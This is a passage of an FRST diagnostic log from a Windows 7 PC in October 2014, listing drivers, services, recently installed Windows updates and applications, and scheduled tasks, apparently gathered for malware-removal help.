(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 AntiLog32; C:\windows\system32\drivers\AntiLog64.sys [49752 2014-10-08] (Zemana Ltd.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [163368 2012-04-01] (Broadcom Corporation.)
R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-08] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-08] (Symantec Corporation)
R3 havabus; C:\Windows\System32\DRIVERS\havabus.sys [45056 2012-12-27] (Monsoon Multimedia Inc.)
R3 HAVATV; C:\Windows\System32\DRIVERS\HAVATV.sys [189568 2012-12-27] (Monsoon Multimedia Inc.)
R3 HavaTV_10; C:\Windows\System32\DRIVERS\HavaTV_10.sys [189568 2012-12-27] (Monsoon Multimedia Inc.)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141024.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
R3 keycrypt; C:\Windows\System32\DRIVERS\KeyCrypt64.sys [25056 2013-07-24] (Zemana Ltd.)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-05-26] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
S3 Logi_Headset_DFU; C:\Windows\System32\Drivers\lhusbdfuamd64.sys [44136 2014-03-07] (CSR plc.)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141026.001\ENG64.SYS [129752 2014-09-08] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141026.001\EX64.SYS [2137304 2014-09-08] (Symantec Corporation)
R1 NEOFLTR_710_19757; C:\windows\system32\Drivers\NEOFLTR_710_19757.SYS [99152 2011-11-14] (Juniper Networks)
S3 SNPSTD3; C:\Windows\System32\DRIVERS\snpstd3.sys [10550272 2007-03-27] (Sonix Co. Ltd.)
R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-14] (support.com, Inc)
R2 sxuptp; C:\Windows\System32\DRIVERS\sxuptp.sys [299184 2011-05-19] (silex technology, Inc.)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-25] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
R3 VCSVADHWSer; C:\Windows\System32\DRIVERS\vcsvad.sys [21504 2008-12-26] (Avnex)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 16:55 - 2014-10-26 16:56 - 00050203 _____ () C:\Users\Office\Desktop\Addition.txt
2014-10-26 16:53 - 2014-10-26 16:57 - 00036720 _____ () C:\Users\Office\Desktop\FRST.txt
2014-10-26 16:53 - 2014-10-26 16:57 - 00000000 ____D () C:\FRST
2014-10-26 16:52 - 2014-10-26 16:52 - 02113024 _____ (Farbar) C:\Users\Office\Desktop\frst64.exe
2014-10-26 12:39 - 2014-10-26 12:39 - 00002254 _____ () C:\Users\Public\Desktop\@TV Setup Wizard.lnk
2014-10-26 12:39 - 2014-10-26 12:39 - 00002217 _____ () C:\Users\Public\Desktop\@TV PC Player.lnk
2014-10-26 12:39 - 2014-10-26 12:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Belkin
2014-10-26 12:36 - 2014-10-26 12:36 - 89390800 _____ () C:\Users\Office\Downloads\@TV_V1.8.3.206 (2).exe
2014-10-24 10:31 - 2014-10-24 10:31 - 00000000 _____ () C:\Users\Office\AppData\Local\{AE1D889B-686A-4E92-BA3D-D5FA40A4D73C}
2014-10-21 21:18 - 2014-10-21 21:43 - 00000000 ____D () C:\Microlife
2014-10-21 21:18 - 2014-10-21 21:18 - 00000830 _____ () C:\Users\Public\Desktop\Microlife BPA 3.2.5A.lnk
2014-10-21 21:18 - 2014-10-21 21:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microlife BPA 3.2.5A
2014-10-19 22:14 - 2014-10-19 22:14 - 00000000 ____D () C:\windows\System32\Tasks\Norton Security Suite
2014-10-19 19:22 - 2014-10-19 20:48 - 00000000 ____D () C:\Navteq
2014-10-19 19:21 - 2014-10-19 20:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Navteq Maps
2014-10-19 19:21 - 2014-10-19 19:22 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navteq Maps
2014-10-15 01:15 - 2014-10-09 19:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-15 01:15 - 2014-10-09 19:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-15 01:15 - 2014-10-09 19:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-15 01:15 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 01:15 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 01:15 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 01:15 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 01:15 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 01:15 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 01:15 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 01:15 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 01:15 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 01:15 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 01:15 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 01:15 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 01:15 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-15 01:15 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 01:15 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 01:15 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-15 01:15 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 01:15 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-15 01:15 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-15 01:15 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 01:15 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 01:15 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 01:15 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-15 01:15 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-15 01:15 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 01:15 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-15 01:15 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-15 01:15 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-15 01:15 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 01:15 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 01:15 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 01:15 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-10-15 01:15 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 01:15 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 01:15 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll
2014-10-15 01:15 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 01:15 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2014-10-15 01:15 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 01:15 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 01:15 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 01:15 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 01:15 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-15 01:15 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe
2014-10-15 01:15 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll
2014-10-15 01:15 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 01:15 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 01:15 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-15 01:15 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 01:15 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 01:15 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 01:15 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 01:15 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll
2014-10-15 01:15 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 01:15 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 01:15 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-15 01:15 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 01:15 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2014-10-15 01:15 - 2014-08-18 20:11 - 00693176 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2014-10-15 01:15 - 2014-08-18 20:10 - 00616352 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi
2014-10-15 01:15 - 2014-08-18 20:08 - 00503808 _____ (Microsoft Corporation) C:\windows\system32\srcore.dll
2014-10-15 01:15 - 2014-08-18 20:08 - 00063488 _____ (Microsoft Corporation) C:\windows\system32\setbcdlocale.dll
2014-10-15 01:15 - 2014-08-18 20:08 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\srclient.dll
2014-10-15 01:15 - 2014-08-18 20:07 - 00296960 _____ (Microsoft Corporation) C:\windows\system32\rstrui.exe
2014-10-15 01:15 - 2014-08-18 20:07 - 00146944 _____ (Microsoft Corporation) C:\windows\system32\appidpolicyconverter.exe
2014-10-15 01:15 - 2014-08-18 20:07 - 00058880 _____ (Microsoft Corporation) C:\windows\system32\appidapi.dll
2014-10-15 01:15 - 2014-08-18 20:07 - 00032256 _____ (Microsoft Corporation) C:\windows\system32\appidsvc.dll
2014-10-15 01:15 - 2014-08-18 20:07 - 00017920 _____ (Microsoft Corporation) C:\windows\system32\appidcertstorecheck.exe
2014-10-15 01:15 - 2014-08-18 19:41 - 00050688 _____ (Microsoft Corporation) C:\windows\SysWOW64\appidapi.dll
2014-10-15 01:15 - 2014-08-18 19:41 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\srclient.dll
2014-10-15 01:15 - 2014-08-18 19:06 - 00061440 _____ (Microsoft Corporation) C:\windows\system32\Drivers\appid.sys
2014-10-15 01:15 - 2014-07-06 19:07 - 14632960 _____ (Microsoft Corporation) C:\windows\system32\wmp.dll
2014-10-15 01:15 - 2014-07-06 19:07 - 00782848 _____ (Microsoft Corporation) C:\windows\system32\wmdrmsdk.dll
2014-10-15 01:15 - 2014-07-06 19:07 - 00229376 _____ (Microsoft Corporation) C:\windows\system32\wintrust.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 05551032 _____ (Microsoft Corporation) C:\windows\system32\ntoskrnl.exe
2014-10-15 01:15 - 2014-07-06 19:06 - 04120576 _____ (Microsoft Corporation) C:\windows\system32\mf.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 01574400 _____ (Microsoft Corporation) C:\windows\system32\quartz.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 01480192 _____ (Microsoft Corporation) C:\windows\system32\crypt32.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 01202176 _____ (Microsoft Corporation) C:\windows\system32\drmv2clt.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 01069056 _____ (Microsoft Corporation) C:\windows\system32\cryptui.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00842240 _____ (Microsoft Corporation) C:\windows\system32\blackbox.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00679424 _____ (Microsoft Corporation) C:\windows\system32\audiosrv.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00641024 _____ (Microsoft Corporation) C:\windows\system32\msscp.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00631808 _____ (Microsoft Corporation) C:\windows\system32\evr.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00500224 _____ (Microsoft Corporation) C:\windows\system32\AUDIOKSE.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00497664 _____ (Microsoft Corporation) C:\windows\system32\drmmgrtn.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00440832 _____ (Microsoft Corporation) C:\windows\system32\AudioEng.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00432128 _____ (Microsoft Corporation) C:\windows\system32\mfplat.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00325632 _____ (Microsoft Corporation) C:\windows\system32\msnetobj.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00296448 _____ (Microsoft Corporation) C:\windows\system32\AudioSes.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00284672 _____ (Microsoft Corporation) C:\windows\system32\EncDump.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00206848 _____ (Microsoft Corporation) C:\windows\system32\mfps.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00188416 _____ (Microsoft Corporation) C:\windows\system32\pcasvc.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00187904 _____ (Microsoft Corporation) C:\windows\system32\cryptsvc.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\cryptsp.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00055808 _____ (Microsoft Corporation) C:\windows\system32\rrinstaller.exe
2014-10-15 01:15 - 2014-07-06 19:06 - 00024576 _____ (Microsoft Corporation) C:\windows\system32\mfpmp.exe
2014-10-15 01:15 - 2014-07-06 19:06 - 00009728 _____ (Microsoft Corporation) C:\windows\system32\spwmp.dll
2014-10-15 01:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\msdxm.ocx
2014-10-15 01:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\dxmasf.dll
2014-10-15 01:15 - 2014-07-06 19:05 - 12625920 _____ (Microsoft Corporation) C:\windows\system32\wmploc.DLL
2014-10-15 01:15 - 2014-07-06 19:05 - 00126464 _____ (Microsoft Corporation) C:\windows\system32\audiodg.exe 2014-10-15 01:15 - 2014-07-06 19:02 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\mferror.dll 2014-10-15 01:15 - 2014-07-06 18:52 - 00663552 _____ (Microsoft Corporation) C:\windows\system32\Drivers\PEAuth.sys 2014-10-15 01:15 - 2014-07-06 18:40 - 11411456 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 03208704 _____ (Microsoft Corporation) C:\windows\SysWOW64\mf.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01329664 _____ (Microsoft Corporation) C:\windows\SysWOW64\quartz.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01174528 _____ (Microsoft Corporation) C:\windows\SysWOW64\crypt32.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01005056 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptui.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00988160 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmv2clt.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00744960 _____ (Microsoft Corporation) C:\windows\SysWOW64\blackbox.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00617984 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmdrmsdk.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00504320 _____ (Microsoft Corporation) C:\windows\SysWOW64\msscp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00489984 _____ (Microsoft Corporation) C:\windows\SysWOW64\evr.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00442880 _____ (Microsoft Corporation) C:\windows\SysWOW64\AUDIOKSE.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00406016 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmmgrtn.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00374784 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioEng.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00354816 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfplat.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00265216 _____ (Microsoft Corporation) C:\windows\SysWOW64\msnetobj.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 
00195584 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioSes.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00179200 _____ (Microsoft Corporation) C:\windows\SysWOW64\wintrust.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00143872 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsvc.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00103424 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfps.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00081408 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00008192 _____ (Microsoft Corporation) C:\windows\SysWOW64\spwmp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\msdxm.ocx 2014-10-15 01:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxmasf.dll 2014-10-15 01:15 - 2014-07-06 18:39 - 12625408 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmploc.DLL 2014-10-15 01:15 - 2014-07-06 18:39 - 03970488 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntkrnlpa.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 03914680 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntoskrnl.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\rrinstaller.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 00023040 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfpmp.exe 2014-10-15 01:15 - 2014-07-06 18:37 - 00002048 _____ (Microsoft Corporation) C:\windows\SysWOW64\mferror.dll 2014-10-15 01:15 - 2014-06-27 17:21 - 00619056 _____ (Microsoft Corporation) C:\windows\system32\winload.exe 2014-10-15 01:15 - 2014-06-27 17:21 - 00532176 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe 2014-10-15 01:15 - 2014-06-27 17:21 - 00457400 _____ (Microsoft Corporation) C:\windows\system32\ci.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) 
C:\windows\SysWOW64\dfshim.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll 2014-10-15 01:14 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll 2014-10-15 01:14 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll 2014-10-15 01:14 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll 2014-10-15 01:14 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll 2014-10-15 01:14 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll 2014-10-15 01:14 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe 2014-10-15 01:14 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe 2014-10-15 01:14 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll 2014-10-15 
01:14 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe 2014-10-15 01:14 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll 2014-10-15 01:14 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys 2014-10-15 01:14 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys 2014-10-13 11:06 - 2014-10-13 11:07 - 00000000 ____D () C:\Users\Office\AppData\Local\{8DFEEE06-483F-466C-A817-40BBB7258E1E} 2014-10-12 23:06 - 2014-10-12 23:06 - 00000000 ____D () C:\Users\Office\AppData\Local\{21005D8E-B41E-4BB6-B38F-C97B1B42F46D} 2014-10-12 11:05 - 2014-10-12 11:05 - 00000000 ____D () C:\Users\Office\AppData\Local\{448B3B98-C5E2-4A60-9DD4-C420497B4AC0} 2014-10-11 23:04 - 2014-10-11 23:05 - 00000000 ____D () C:\Users\Office\AppData\Local\{E86237C9-8745-4329-8B2B-2FF1AF029720} 2014-10-11 11:04 - 2014-10-11 11:04 - 00000000 ____D () C:\Users\Office\AppData\Local\{811294BF-21A5-457B-A6CE-C429C8F96B5B} 2014-10-10 23:04 - 2014-10-10 23:04 - 00000000 ____D () C:\Users\Office\AppData\Local\{FC5068DC-59E2-4A01-A1FC-DDCFB4832DCD} 2014-10-08 21:33 - 2014-10-08 21:33 - 00000000 ____D () C:\Users\Office\AppData\Local\{84319DC6-9932-46E2-BD18-647922F96978} 2014-10-08 15:25 - 2014-10-08 15:25 - 00068189 ____N () C:\Users\Office\Desktop\Through Aug 2014.xlsx 2014-10-06 21:25 - 2014-10-06 21:25 - 00000000 ____D () C:\Users\Office\AppData\Local\{E87F91F0-81EC-41AD-B4F2-08328B833D5B} 2014-10-02 21:36 - 
2014-10-02 21:48 - 00000000 ____D () C:\Program Files (x86)\JustCloud 2014-10-02 21:36 - 2014-10-02 21:36 - 00001122 _____ () C:\Users\Office\Desktop\JustCloud.lnk 2014-10-02 21:36 - 2014-10-02 21:36 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JustCloud 2014-09-30 10:23 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll 2014-09-30 10:23 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll 2014-09-27 20:10 - 2014-09-28 08:10 - 00000000 ____D () C:\Users\Office\AppData\Local\{C02CAFEA-9471-4665-8673-C33F09A8F129} ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-26 16:43 - 2013-07-12 15:43 - 00000290 _____ () C:\windows\Tasks\DSite.job 2014-10-26 16:42 - 2014-02-24 19:25 - 00000568 _____ () C:\windows\Tasks\G2MUpdateTask-S-1-5-21-3549027879-2872290269-2961675323-1000.job 